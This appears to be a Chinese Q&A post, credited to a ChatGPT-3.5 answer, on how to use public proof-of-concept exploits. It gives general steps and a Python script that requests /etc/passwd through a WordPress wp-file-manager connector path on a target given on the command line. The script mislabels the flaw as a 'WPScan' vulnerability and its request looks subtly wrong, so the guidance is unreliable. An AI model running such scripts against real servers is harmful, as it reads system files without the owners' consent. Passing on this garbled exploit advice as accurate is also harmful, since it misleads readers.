如何运用公开的漏洞库里面的POC进行漏洞利用

晚上好🌙🌙🌙
本答案参考ChatGPT-3.5

公开的漏洞库中常会提供漏洞的利用代码，也即是POC，以下是对利用POC的详细步骤：

1. 确认漏洞类型：首先需要确认文件中提供的漏洞类型，通常在文件名称或文件内部会有注明，需要了解漏洞所在的应用程序、版本、操作系统以及会受到影响的范围等信息。

2. 理解POC代码：读取POC文件中的代码，确保读懂了所有代码段的含义，包括利用漏洞所需的输入参数，利用后的输出结果等。

3. 修改配置参数：根据具体情况，需要修改代码中的参数，例如目标URL、端口、攻击者IP等等。同时也要了解这些参数的含义，确定是否需要修改。

4. 运行POC代码：执行POC代码，监听返回值。如果代码输出了攻击成功的消息，则表明漏洞已被成功利用；否则继续修改参数或调整代码。

下面是POC代码样例以及操作步骤：

1. 根据以下文本样式，此为一个Python脚本，先安装对应依赖，再执行程序：

from requests import get
import sys

print('[*] Testing WPScan ...')

url = 'http://' + sys.argv[1] + '/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php'
data = 'mode=getfile&path=/etc/passwd'

try:
    req = get(url + '?' + data)
    if req.status_code == 200 and 'root:x:0:0' in req.text:
        print('[+] {} is vulnerable'.format(sys.argv[1]))
    else:
        print('[-] {} is not vulnerable'.format(sys.argv[1]))
except:
    print('[-] {} is not vulnerable'.format(sys.argv[1]))

1. 在脚本所在目录下，使用以下命令执行：

python poc.py <target_ip_address>

1. 脚本将会测试 <target_ip_address> 是否存在 WPScan 攻击点，成功则返回攻击成功消息。

需要注意的是，在任何情况下，请确保已获得授权情况下使用漏洞利用工具和漏洞（POC）代码，否则可能会违反相关法律法规。